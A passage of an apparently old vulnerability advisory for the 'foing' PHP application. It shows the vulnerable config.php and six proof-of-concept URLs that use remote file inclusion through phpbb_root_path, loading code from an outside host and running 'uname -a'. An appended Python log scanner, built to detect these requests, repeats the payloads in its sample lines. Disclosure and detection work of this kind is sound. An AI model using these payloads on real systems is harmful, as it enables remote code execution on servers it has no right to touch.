0.6.0
0.5.0
0.4.0
0.3.0
0.2.0
"Powered by foing 0.6.0 © 2003, 2004 Foing Group" etc..
Vulnerable code:
Look at config.php in the installation directory.
There you will find …
<?php
define('FOING_INSTALLED', true);
$phpbb_root_path = '…/';
$foing_prefix = $table_prefix;
?>
Proof of Concept:
http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
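
Detection for the request pattern above, as an added example that is not part of the original advisory: it scans web access log lines for a phpbb_root_path query parameter supplied by the client and marks values that point at a remote URL. The log lines are constructed samples, and the function and constant names are hypothetical.

```python
import re
from urllib.parse import parse_qsl

# Request line inside a common/combined-format access log entry.
# Non-greedy match so an unencoded space in the query (cmd=uname -a) still parses.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# A value starting with a URL scheme (http:, ftp:, php:, data:) or "//".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//)', re.IGNORECASE)
PARAM = "phpbb_root_path"  # configuration variable named in the advisory

def scan_line(line):
    """Return (script_path, decoded_value, kind) for a suspicious request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    # parse_qsl percent-decodes once, so http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == PARAM:
            # The variable should only ever come from config.php, so any
            # client-supplied value is worth a look; a URL is the include attempt.
            kind = "remote-include" if REMOTE_RE.match(value) else "variable-override"
            return (path, value, kind)
    return None

def scan(lines):
    """Scan an iterable of log lines and return every hit."""
    return [hit for hit in map(scan_line, lines) if hit]

# Constructed sample log lines (documentation IP ranges, assumed /foing/ install path).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /foing/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /foing/song.php'
    '?phpbb_root_path=http://evilcode.txt?&cmd=uname%20-a HTTP/1.1" 200 310',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /foing/faq.php'
    '?phpbb_root_path=hTTp%3A%2F%2Fevilcode.txt%3F HTTP/1.1" 200 298',
    '192.0.2.44 - - [01/Jan/2024:10:01:00 +0000] "GET /foing/list.php'
    '?phpbb_root_path=../ HTTP/1.1" 200 4410',
    '192.0.2.10 - - [01/Jan/2024:10:02:00 +0000] "GET /foing/playlist.php?id=7 HTTP/1.1" 200 2001',
]

if __name__ == "__main__":
    for path, value, kind in scan(SAMPLE_LOG):
        print(f"{kind:18} {path}  {PARAM}={value!r}")
```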